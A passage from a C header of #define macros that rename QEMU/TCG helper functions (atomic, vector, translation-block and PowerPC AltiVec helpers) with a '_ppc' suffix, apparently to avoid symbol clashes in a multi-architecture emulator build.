helper_atomic_xchgw_le helper_atomic_xchgw_le_ppc #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_ppc #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_ppc #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_ppc #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_ppc #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_ppc #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_ppc #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_ppc #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_ppc #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_ppc #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_ppc #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_ppc #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_ppc #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_ppc #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_ppc #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_ppc #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_ppc #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_ppc #define helper_atomic_xchgw_be helper_atomic_xchgw_be_ppc #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_ppc #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_ppc #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_ppc #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_ppc #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_ppc #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_ppc #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_ppc #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_ppc #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_ppc #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_ppc #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_ppc #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_ppc #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_ppc #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_ppc #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_ppc #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_ppc #define 
helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_ppc #define helper_atomic_xchgl_le helper_atomic_xchgl_le_ppc #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_ppc #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_ppc #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_ppc #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_ppc #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_ppc #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_ppc #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_ppc #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_ppc #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_ppc #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_ppc #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_ppc #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_ppc #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_ppc #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_ppc #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_ppc #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_ppc #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_ppc #define helper_atomic_xchgl_be helper_atomic_xchgl_be_ppc #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_ppc #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_ppc #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_ppc #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_ppc #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_ppc #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_ppc #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_ppc #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_ppc #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_ppc #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_ppc #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_ppc #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_ppc #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_ppc #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_ppc #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_ppc #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_ppc #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_ppc #define helper_atomic_xchgq_le helper_atomic_xchgq_le_ppc #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_ppc #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_ppc #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_ppc #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_ppc #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_ppc #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_ppc #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_ppc #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_ppc #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_ppc #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_ppc #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_ppc #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_ppc #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_ppc #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_ppc #define helper_atomic_smax_fetchq_le 
helper_atomic_smax_fetchq_le_ppc #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_ppc #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_ppc #define helper_atomic_xchgq_be helper_atomic_xchgq_be_ppc #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_ppc #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_ppc #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_ppc #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_ppc #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_ppc #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_ppc #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_ppc #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_ppc #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_ppc #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_ppc #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_ppc #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_ppc #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_ppc #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_ppc #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_ppc #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_ppc #define cpu_ldub_code cpu_ldub_code_ppc #define cpu_lduw_code cpu_lduw_code_ppc #define cpu_ldl_code cpu_ldl_code_ppc #define cpu_ldq_code cpu_ldq_code_ppc #define helper_div_i32 helper_div_i32_ppc #define helper_rem_i32 helper_rem_i32_ppc #define helper_divu_i32 helper_divu_i32_ppc #define helper_remu_i32 helper_remu_i32_ppc #define helper_shl_i64 helper_shl_i64_ppc #define helper_shr_i64 helper_shr_i64_ppc #define helper_sar_i64 helper_sar_i64_ppc #define helper_div_i64 helper_div_i64_ppc #define helper_rem_i64 helper_rem_i64_ppc #define helper_divu_i64 helper_divu_i64_ppc #define helper_remu_i64 helper_remu_i64_ppc #define helper_muluh_i64 helper_muluh_i64_ppc #define helper_mulsh_i64 helper_mulsh_i64_ppc #define helper_clz_i32 helper_clz_i32_ppc #define helper_ctz_i32 helper_ctz_i32_ppc #define helper_clz_i64 helper_clz_i64_ppc #define helper_ctz_i64 helper_ctz_i64_ppc #define helper_clrsb_i32 helper_clrsb_i32_ppc #define helper_clrsb_i64 helper_clrsb_i64_ppc #define helper_ctpop_i32 helper_ctpop_i32_ppc #define helper_ctpop_i64 helper_ctpop_i64_ppc #define helper_lookup_tb_ptr helper_lookup_tb_ptr_ppc #define helper_exit_atomic helper_exit_atomic_ppc #define helper_gvec_add8 helper_gvec_add8_ppc #define helper_gvec_add16 helper_gvec_add16_ppc #define helper_gvec_add32 helper_gvec_add32_ppc #define helper_gvec_add64 helper_gvec_add64_ppc #define helper_gvec_adds8 helper_gvec_adds8_ppc #define helper_gvec_adds16 helper_gvec_adds16_ppc #define helper_gvec_adds32 helper_gvec_adds32_ppc #define helper_gvec_adds64 helper_gvec_adds64_ppc #define helper_gvec_sub8 helper_gvec_sub8_ppc #define helper_gvec_sub16 helper_gvec_sub16_ppc #define helper_gvec_sub32 helper_gvec_sub32_ppc #define helper_gvec_sub64 helper_gvec_sub64_ppc #define helper_gvec_subs8 helper_gvec_subs8_ppc #define helper_gvec_subs16 helper_gvec_subs16_ppc #define helper_gvec_subs32 helper_gvec_subs32_ppc #define helper_gvec_subs64 helper_gvec_subs64_ppc #define helper_gvec_mul8 helper_gvec_mul8_ppc #define helper_gvec_mul16 helper_gvec_mul16_ppc #define helper_gvec_mul32 helper_gvec_mul32_ppc #define helper_gvec_mul64 helper_gvec_mul64_ppc #define helper_gvec_muls8 helper_gvec_muls8_ppc #define helper_gvec_muls16 
helper_gvec_muls16_ppc #define helper_gvec_muls32 helper_gvec_muls32_ppc #define helper_gvec_muls64 helper_gvec_muls64_ppc #define helper_gvec_neg8 helper_gvec_neg8_ppc #define helper_gvec_neg16 helper_gvec_neg16_ppc #define helper_gvec_neg32 helper_gvec_neg32_ppc #define helper_gvec_neg64 helper_gvec_neg64_ppc #define helper_gvec_abs8 helper_gvec_abs8_ppc #define helper_gvec_abs16 helper_gvec_abs16_ppc #define helper_gvec_abs32 helper_gvec_abs32_ppc #define helper_gvec_abs64 helper_gvec_abs64_ppc #define helper_gvec_mov helper_gvec_mov_ppc #define helper_gvec_dup64 helper_gvec_dup64_ppc #define helper_gvec_dup32 helper_gvec_dup32_ppc #define helper_gvec_dup16 helper_gvec_dup16_ppc #define helper_gvec_dup8 helper_gvec_dup8_ppc #define helper_gvec_not helper_gvec_not_ppc #define helper_gvec_and helper_gvec_and_ppc #define helper_gvec_or helper_gvec_or_ppc #define helper_gvec_xor helper_gvec_xor_ppc #define helper_gvec_andc helper_gvec_andc_ppc #define helper_gvec_orc helper_gvec_orc_ppc #define helper_gvec_nand helper_gvec_nand_ppc #define helper_gvec_nor helper_gvec_nor_ppc #define helper_gvec_eqv helper_gvec_eqv_ppc #define helper_gvec_ands helper_gvec_ands_ppc #define helper_gvec_xors helper_gvec_xors_ppc #define helper_gvec_ors helper_gvec_ors_ppc #define helper_gvec_shl8i helper_gvec_shl8i_ppc #define helper_gvec_shl16i helper_gvec_shl16i_ppc #define helper_gvec_shl32i helper_gvec_shl32i_ppc #define helper_gvec_shl64i helper_gvec_shl64i_ppc #define helper_gvec_shr8i helper_gvec_shr8i_ppc #define helper_gvec_shr16i helper_gvec_shr16i_ppc #define helper_gvec_shr32i helper_gvec_shr32i_ppc #define helper_gvec_shr64i helper_gvec_shr64i_ppc #define helper_gvec_sar8i helper_gvec_sar8i_ppc #define helper_gvec_sar16i helper_gvec_sar16i_ppc #define helper_gvec_sar32i helper_gvec_sar32i_ppc #define helper_gvec_sar64i helper_gvec_sar64i_ppc #define helper_gvec_shl8v helper_gvec_shl8v_ppc #define helper_gvec_shl16v helper_gvec_shl16v_ppc #define helper_gvec_shl32v helper_gvec_shl32v_ppc #define helper_gvec_shl64v helper_gvec_shl64v_ppc #define helper_gvec_shr8v helper_gvec_shr8v_ppc #define helper_gvec_shr16v helper_gvec_shr16v_ppc #define helper_gvec_shr32v helper_gvec_shr32v_ppc #define helper_gvec_shr64v helper_gvec_shr64v_ppc #define helper_gvec_sar8v helper_gvec_sar8v_ppc #define helper_gvec_sar16v helper_gvec_sar16v_ppc #define helper_gvec_sar32v helper_gvec_sar32v_ppc #define helper_gvec_sar64v helper_gvec_sar64v_ppc #define helper_gvec_eq8 helper_gvec_eq8_ppc #define helper_gvec_ne8 helper_gvec_ne8_ppc #define helper_gvec_lt8 helper_gvec_lt8_ppc #define helper_gvec_le8 helper_gvec_le8_ppc #define helper_gvec_ltu8 helper_gvec_ltu8_ppc #define helper_gvec_leu8 helper_gvec_leu8_ppc #define helper_gvec_eq16 helper_gvec_eq16_ppc #define helper_gvec_ne16 helper_gvec_ne16_ppc #define helper_gvec_lt16 helper_gvec_lt16_ppc #define helper_gvec_le16 helper_gvec_le16_ppc #define helper_gvec_ltu16 helper_gvec_ltu16_ppc #define helper_gvec_leu16 helper_gvec_leu16_ppc #define helper_gvec_eq32 helper_gvec_eq32_ppc #define helper_gvec_ne32 helper_gvec_ne32_ppc #define helper_gvec_lt32 helper_gvec_lt32_ppc #define helper_gvec_le32 helper_gvec_le32_ppc #define helper_gvec_ltu32 helper_gvec_ltu32_ppc #define helper_gvec_leu32 helper_gvec_leu32_ppc #define helper_gvec_eq64 helper_gvec_eq64_ppc #define helper_gvec_ne64 helper_gvec_ne64_ppc #define helper_gvec_lt64 helper_gvec_lt64_ppc #define helper_gvec_le64 helper_gvec_le64_ppc #define helper_gvec_ltu64 helper_gvec_ltu64_ppc #define helper_gvec_leu64 
helper_gvec_leu64_ppc #define helper_gvec_ssadd8 helper_gvec_ssadd8_ppc #define helper_gvec_ssadd16 helper_gvec_ssadd16_ppc #define helper_gvec_ssadd32 helper_gvec_ssadd32_ppc #define helper_gvec_ssadd64 helper_gvec_ssadd64_ppc #define helper_gvec_sssub8 helper_gvec_sssub8_ppc #define helper_gvec_sssub16 helper_gvec_sssub16_ppc #define helper_gvec_sssub32 helper_gvec_sssub32_ppc #define helper_gvec_sssub64 helper_gvec_sssub64_ppc #define helper_gvec_usadd8 helper_gvec_usadd8_ppc #define helper_gvec_usadd16 helper_gvec_usadd16_ppc #define helper_gvec_usadd32 helper_gvec_usadd32_ppc #define helper_gvec_usadd64 helper_gvec_usadd64_ppc #define helper_gvec_ussub8 helper_gvec_ussub8_ppc #define helper_gvec_ussub16 helper_gvec_ussub16_ppc #define helper_gvec_ussub32 helper_gvec_ussub32_ppc #define helper_gvec_ussub64 helper_gvec_ussub64_ppc #define helper_gvec_smin8 helper_gvec_smin8_ppc #define helper_gvec_smin16 helper_gvec_smin16_ppc #define helper_gvec_smin32 helper_gvec_smin32_ppc #define helper_gvec_smin64 helper_gvec_smin64_ppc #define helper_gvec_smax8 helper_gvec_smax8_ppc #define helper_gvec_smax16 helper_gvec_smax16_ppc #define helper_gvec_smax32 helper_gvec_smax32_ppc #define helper_gvec_smax64 helper_gvec_smax64_ppc #define helper_gvec_umin8 helper_gvec_umin8_ppc #define helper_gvec_umin16 helper_gvec_umin16_ppc #define helper_gvec_umin32 helper_gvec_umin32_ppc #define helper_gvec_umin64 helper_gvec_umin64_ppc #define helper_gvec_umax8 helper_gvec_umax8_ppc #define helper_gvec_umax16 helper_gvec_umax16_ppc #define helper_gvec_umax32 helper_gvec_umax32_ppc #define helper_gvec_umax64 helper_gvec_umax64_ppc #define helper_gvec_bitsel helper_gvec_bitsel_ppc #define cpu_restore_state cpu_restore_state_ppc #define page_collection_lock page_collection_lock_ppc #define page_collection_unlock page_collection_unlock_ppc #define free_code_gen_buffer free_code_gen_buffer_ppc #define tcg_exec_init tcg_exec_init_ppc #define tb_cleanup tb_cleanup_ppc #define tb_flush tb_flush_ppc #define tb_phys_invalidate tb_phys_invalidate_ppc #define tb_gen_code tb_gen_code_ppc #define tb_exec_lock tb_exec_lock_ppc #define tb_exec_unlock tb_exec_unlock_ppc #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_ppc #define tb_invalidate_phys_range tb_invalidate_phys_range_ppc #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_ppc #define tb_check_watchpoint tb_check_watchpoint_ppc #define cpu_io_recompile cpu_io_recompile_ppc #define tb_flush_jmp_cache tb_flush_jmp_cache_ppc #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_ppc #define translator_loop_temp_check translator_loop_temp_check_ppc #define translator_loop translator_loop_ppc #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_ppc #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_ppc #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_ppc #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_ppc #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_ppc #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_ppc #define unassigned_mem_ops unassigned_mem_ops_ppc #define floatx80_infinity floatx80_infinity_ppc #define dup_const_func dup_const_func_ppc #define gen_helper_raise_exception gen_helper_raise_exception_ppc #define gen_helper_raise_interrupt gen_helper_raise_interrupt_ppc #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_ppc #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_ppc #define gen_helper_cpsr_read gen_helper_cpsr_read_ppc #define 
gen_helper_cpsr_write gen_helper_cpsr_write_ppc #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_ppc #define ppc_cpu_unrealize ppc_cpu_unrealize_ppc #define ppc_cpu_instance_finalize ppc_cpu_instance_finalize_ppc #define ppc_cpu_do_interrupt ppc_cpu_do_interrupt_ppc #define ppc_cpu_do_system_reset ppc_cpu_do_system_reset_ppc #define ppc_cpu_do_fwnmi_machine_check ppc_cpu_do_fwnmi_machine_check_ppc #define ppc_cpu_exec_interrupt ppc_cpu_exec_interrupt_ppc #define raise_exception_err_ra raise_exception_err_ra_ppc #define raise_exception_err raise_exception_err_ppc #define raise_exception raise_exception_ppc #define raise_exception_ra raise_exception_ra_ppc #define helper_raise_exception_err helper_raise_exception_err_ppc #define helper_store_msr helper_store_msr_ppc #define helper_rfi helper_rfi_ppc #define helper_40x_rfci helper_40x_rfci_ppc #define helper_rfdi helper_rfdi_ppc #define helper_rfci helper_rfci_ppc #define helper_rfmci helper_rfmci_ppc #define helper_tw helper_tw_ppc #define helper_rfsvc helper_rfsvc_ppc #define helper_msgclr helper_msgclr_ppc #define helper_msgsnd helper_msgsnd_ppc #define helper_book3s_msgclr helper_book3s_msgclr_ppc #define ppc_cpu_do_unaligned_access ppc_cpu_do_unaligned_access_ppc #define helper_divweu helper_divweu_ppc #define helper_divwe helper_divwe_ppc #define helper_sraw helper_sraw_ppc #define helper_popcntb helper_popcntb_ppc #define helper_div helper_div_ppc #define helper_divo helper_divo_ppc #define helper_divs helper_divs_ppc #define helper_divso helper_divso_ppc #define helper_602_mfrom helper_602_mfrom_ppc #define helper_mtvscr helper_mtvscr_ppc #define helper_vaddcuw helper_vaddcuw_ppc #define helper_vprtybw helper_vprtybw_ppc #define helper_vprtybd helper_vprtybd_ppc #define helper_vprtybq helper_vprtybq_ppc #define helper_vmuluwm helper_vmuluwm_ppc #define helper_vaddfp helper_vaddfp_ppc #define helper_vsubfp helper_vsubfp_ppc #define helper_vminfp helper_vminfp_ppc #define helper_vmaxfp helper_vmaxfp_ppc #define helper_vmaddfp helper_vmaddfp_ppc #define helper_vnmsubfp helper_vnmsubfp_ppc #define helper_vaddsbs helper_vaddsbs_ppc #define helper_vsubsbs helper_vsubsbs_ppc #define helper_vsubshs helper_vsubshs_ppc #define helper_vaddsws helper_vaddsws_ppc #define helper_vsubsws helper_vsubsws_ppc #define helper_vaddubs helper_vaddubs_ppc #define helper_vsububs helper_vsububs_ppc #define helper_vadduhs helper_vadduhs_ppc #define helper_vsubuhs helper_vsubuhs_ppc #define helper_vadduws helper_vadduws_ppc #define helper_vsubuws helper_vsubuws_ppc #define helper_vavgsb helper_vavgsb_ppc #define helper_vavgub helper_vavgub_ppc #define helper_vavgsh helper_vavgsh_ppc #define helper_vavguh helper_vavguh_ppc #define helper_vavgsw helper_vavgsw_ppc #define helper_vabsdub helper_vabsdub_ppc #define helper_vabsduh helper_vabsduh_ppc #define helper_vabsduw helper_vabsduw_ppc #define helper_vcfux helper_vcfux_ppc #define helper_vcfsx helper_vcfsx_ppc #define helper_vcmpequb helper_vcmpequb_ppc #define helper_vcmpequb_dot helper_vcmpequb_dot_ppc #define helper_vcmpequw helper_vcmpequw_ppc #define helper_vcmpequw_dot helper_vcmpequw_dot_ppc #define helper_vcmpequd helper_vcmpequd_ppc #define helper_vcmpequd_dot helper_vcmpequd_dot_ppc #define helper_vcmpgtub helper_vcmpgtub_ppc #define helper_vcmpgtub_dot helper_vcmpgtub_dot_ppc #define helper_vcmpgtuh helper_vcmpgtuh_ppc #define helper_vcmpgtuh_dot helper_vcmpgtuh_dot_ppc #define helper_vcmpgtuw helper_vcmpgtuw_ppc #define helper_vcmpgtuw_dot helper_vcmpgtuw_dot_ppc #define helper_vcmpgtud 
helper_vcmpgtud_ppc #define helper_vcmpgtud_dot helper_vcmpgtud_dot_ppc #define helper_vcmpgtsb helper_vcmpgtsb_ppc #define helper_vcmpgtsb_dot helper_vcmpgtsb_dot_ppc #define helper_vcmpgtsh helper_vcmpgtsh_ppc #define helper_vcmpgtsh_dot helper_vcmpgtsh_dot_ppc #define helper_vcmpgtsw helper_vcmpgtsw_ppc #define helper_vcmpgtsw_dot helper_vcmpgtsw_dot_ppc #define helper_vcmpgtsd helper_vcmpgtsd_ppc #define helper_vcmpgtsd_dot helper_vcmpgtsd_dot_ppc #define helper_vcmpnezb helper_vcmpnezb_ppc #define helper_vcmpnezb_dot helper_vcmpnezb_dot_ppc #define helper_vcmpnezw helper_vcmpnezw_ppc #define helper_vcmpnezw_dot helper_vcmpnezw_dot_ppc #define helper_vcmpneb helper_vcmpneb_ppc #define helper_vcmpneb_dot helper_vcmpneb_dot_ppc #define helper_vcmpneh helper_vcmpneh_ppc #define helper_vcmpneh_dot helper_vcmpneh_dot_ppc #define helper_vcmpnew helper_vcmpnew_ppc #define helper_vcmpnew_dot helper_vcmpnew_dot_ppc #define helper_vcmpeqfp helper_vcmpeqfp_ppc #define helper_vcmpeqfp_dot helper_vcmpeqfp_dot_ppc #define helper_vcmpgefp helper_vcmpgefp_ppc #define helper_vcmpgefp_dot helper_vcmpgefp_dot_ppc #define helper_vcmpgtfp helper_vcmpgtfp_ppc #define helper_vcmpgtfp_dot helper_vcmpgtfp_dot_ppc #define helper_vcmpbfp helper_vcmpbfp_ppc #define helper_vcmpbfp_dot helper_vcmpbfp_dot_ppc #define helper_vctuxs helper_vctuxs_ppc #define helper_vctsxs helper_vctsxs_ppc #define helper_vclzlsbb helper_vclzlsbb_ppc #define helper_vctzlsbb helper_vctzlsbb_ppc #define helper_vmhaddshs helper_vmhaddshs_ppc #define helper_vmhraddshs helper_vmhraddshs_ppc #define helper_vmladduhm helper_vmladduhm_ppc #define helper_vmrglb helper_vmrglb_ppc #define helper_vmrghb helper_vmrghb_ppc #define helper_vmrglh helper_vmrglh_ppc #define helper_vmrghh helper_vmrghh_ppc #define helper_vmrglw helper_vmrglw_ppc #define helper_vmrghw helper_vmrghw_ppc #define helper_vmsummbm helper_vmsummbm_ppc #define helper_vmsumshs helper_vmsumshs_ppc #define helper_vmsumubm helper_vmsumubm_ppc #define helper_vmsumuhm helper_vmsumuhm_ppc #define helper_vmulesb helper_vmulesb_ppc #define helper_vmulosb helper_vmulosb_ppc #define helper_vmulesh helper_vmulesh_ppc #define helper_vmulesw helper_vmulesw_ppc #define helper_vmuleub helper_vmuleub_ppc #define helper_vmuloub helper_vmuloub_ppc #define helper_vmuleuh helper_vmuleuh_ppc #define helper_vmulouh helper_vmulouh_ppc #define helper_vmuleuw helper_vmuleuw_ppc #define helper_vmulouw helper_vmulouw_ppc #define helper_vperm helper_vperm_ppc #define helper_vpermr helper_vpermr_ppc #define helper_vbpermd helper_vbpermd_ppc #define helper_vpmsumb helper_vpmsumb_ppc #define helper_vpmsumh helper_vpmsumh_ppc #define helper_vpmsumw helper_vpmsumw_ppc #define helper_vpmsumd helper_vpmsumd_ppc #define helper_vpkpx helper_vpkpx_ppc #define helper_vpkshss helper_vpkshss_ppc #define helper_vpkshus helper_vpkshus_ppc #define helper_vpkswss helper_vpkswss_ppc #define helper_vpkswus helper_vpkswus_ppc #define helper_vpksdss helper_vpksdss_ppc #define helper_vpksdus helper_vpksdus_ppc #define helper_vpkuhus helper_vpkuhus_ppc #define
helper_vpkuwus helper_vpkuwus_ppc #define helper_vpkudus helper_vpkudus_ppc #define helper_vpkuhum helper_vpkuhum_ppc #define helper_vpkuwum helper_vpkuwum_ppc #define helper_vpkudum helper_vpkudum_ppc #define helper_vrefp helper_vrefp_ppc #define helper_vrfin helper_vrfin_ppc #define helper_vrfim helper_vrfim_ppc #define helper_vrfip helper_vrfip_ppc #define helper_vrfiz helper_vrfiz_ppc #define helper_vrlb helper_vrlb_ppc #define helper_vrlh helper_vrlh_ppc #define helper_vrlw helper_vrlw_ppc #define helper_vrld helper_vrld_ppc #define helper_vrsqrtefp helper_vrsqrtefp_ppc #define helper_vrldmi helper_vrldmi_ppc #define helper_vrlwmi helper_vrlwmi_ppc #define helper_vrldnm helper_vrldnm_ppc #define helper_vrlwnm helper_vrlwnm_ppc #define helper_vsel helper_vsel_ppc #define helper_vexptefp helper_vexptefp_ppc #define helper_vlogefp helper_vlogefp_ppc #define helper_vextublx helper_vextublx_ppc #define helper_vextuhlx helper_vextuhlx_ppc #define helper_vextuwlx helper_vextuwlx_ppc #define helper_vextubrx helper_vextubrx_ppc #define helper_vextuhrx helper_vextuhrx_ppc #define helper_vextuwrx helper_vextuwrx_ppc #define helper_vslv helper_vslv_ppc #define helper_vsrv helper_vsrv_ppc #define helper_vsldoi helper_vsldoi_ppc #define helper_vslo helper_vslo_ppc #define helper_vinsertb helper_vinsertb_ppc #define helper_vinserth helper_vinserth_ppc #define helper_vinsertw helper_vinsertw_ppc #define helper_vinsertd helper_vinsertd_ppc #define helper_vextractub helper_vextractub_ppc #define helper_vextractuh helper_vextractuh_ppc #define helper_vextractuw helper_vextractuw_ppc #define helper_vextractd helper_vextractd_ppc #define helper_xxextractuw helper_xxextractuw_ppc #define helper_xxinsertw helper_xxinsertw_ppc #define helper_vextsb2w helper_vextsb2w_ppc #define helper_vextsb2d helper_vextsb2d_ppc #define helper_vextsh2w helper_vextsh2w_ppc #define helper_vextsh2d helper_vextsh2d_ppc #define helper_vnegw helper_vnegw_ppc #define helper_vnegd helper_vnegd_ppc #define helper_vsro helper_vsro_ppc #define helper_vsubcuw helper_vsubcuw_ppc #define helper_vsumsws helper_vsumsws_ppc #define helper_vsum2sws helper_vsum2sws_ppc #define helper_vsum4sbs helper_vsum4sbs_ppc #define helper_vsum4shs helper_vsum4shs_ppc #define helper_vsum4ubs helper_vsum4ubs_ppc #define helper_vupklpx helper_vupklpx_ppc #define helper_vupkhpx helper_vupkhpx_ppc #define helper_vupkhsb helper_vupkhsb_ppc #define helper_vupkhsh helper_vupkhsh_ppc #define helper_vupkhsw helper_vupkhsw_ppc #define helper_vupklsb helper_vupklsb_ppc #define helper_vupklsh helper_vupklsh_ppc #define helper_vupklsw helper_vupklsw_ppc #define helper_vclzb helper_vclzb_ppc #define helper_vclzh helper_vclzh_ppc #define helper_vctzb helper_vctzb_ppc #define helper_vctzh helper_vctzh_ppc #define helper_vctzw helper_vctzw_ppc #define helper_vctzd helper_vctzd_ppc #define helper_vpopcntb helper_vpopcntb_ppc #define helper_vpopcnth helper_vpopcnth_ppc #define helper_vpopcntw helper_vpopcntw_ppc #define helper_vpopcntd helper_vpopcntd_ppc #define helper_vadduqm helper_vadduqm_ppc #define helper_vaddeuqm helper_vaddeuqm_ppc #define helper_vaddcuq helper_vaddcuq_ppc #define helper_vaddecuq helper_vaddecuq_ppc #define helper_vsubuqm helper_vsubuqm_ppc #define helper_vsubeuqm helper_vsubeuqm_ppc #define helper_vsubcuq helper_vsubcuq_ppc #define helper_vsubecuq helper_vsubecuq_ppc #define helper_bcdadd helper_bcdadd_ppc #define helper_bcdsub helper_bcdsub_ppc #define helper_bcdcfn helper_bcdcfn_ppc #define helper_bcdctn helper_bcdctn_ppc #define helper_bcdcfz 
